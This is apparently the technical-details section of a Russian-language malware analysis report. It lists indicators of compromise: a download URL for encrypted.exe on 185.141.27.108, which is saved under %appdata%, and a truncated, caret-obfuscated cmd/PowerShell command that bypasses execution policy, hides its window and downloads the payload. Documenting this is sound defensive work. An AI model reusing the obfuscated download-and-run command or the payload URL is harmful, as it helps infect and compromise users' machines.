Техническая информация
- http://185.141.27.108/encrypted.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Powers^helL.Exe^ -EXe^Cuti^o^NpO^LIcy B^yP^Ass -^no^p^r^O^FIL^E^ -WINdO^ws^Ty^lE HIdde^n (NeW-ob^J^eC^t S^y^S^T^eM.^N^ET.wEbC^LieNt^)^.^DOWNLOA^DFIL^E^('http://185.141.27.108/...
- '18#.#41.27.108':80
- http://18#.#41.27.108/encrypted.exe
- '<SYSTEM32>\cmd.exe' /c "Powers^helL.Exe^ -EXe^Cuti^o^NpO^LIcy B^yP^Ass -^no^p^r^O^FIL^E^ -WINdO^ws^Ty^lE HIdde^n (NeW-ob^J^eC^t S^y^S^T^eM.^N^ET.wEbC^LieNt^)^.^DOWNLOA^DFIL^E^('http://185.141.27.108/...' (со скрытым окном)